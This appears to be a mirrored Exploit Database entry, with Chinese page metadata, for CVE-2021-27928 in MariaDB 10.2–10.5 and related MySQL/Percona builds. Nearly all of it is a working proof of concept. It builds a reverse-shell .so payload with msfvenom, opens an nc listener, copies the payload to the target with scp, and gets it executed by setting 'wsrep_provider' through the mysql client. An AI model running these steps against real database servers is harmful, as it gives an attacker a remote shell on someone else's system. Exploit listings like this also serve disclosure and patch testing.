MariaDB 10.2 – ‘wsrep_provider’ OS Command Execution

• Exploit Database
• 57 阅读

• 作者： Central InfoSec
  日期： 2021-04-14
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/49765/

• # Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
  # Date: 03/18/2021
  # Exploit Author: Central InfoSec
  # Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
  # Tested on: Linux
  # CVE : CVE-2021-27928
  
  # Proof of Concept:
  
  # Create the reverse shell payload
  msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
  
  # Start a listener
  nc -lvp <port>
  
  # Copy the payload to the target machine (In this example, SCP/SSH is used)
  scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
  
  # Execute the payload
  mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'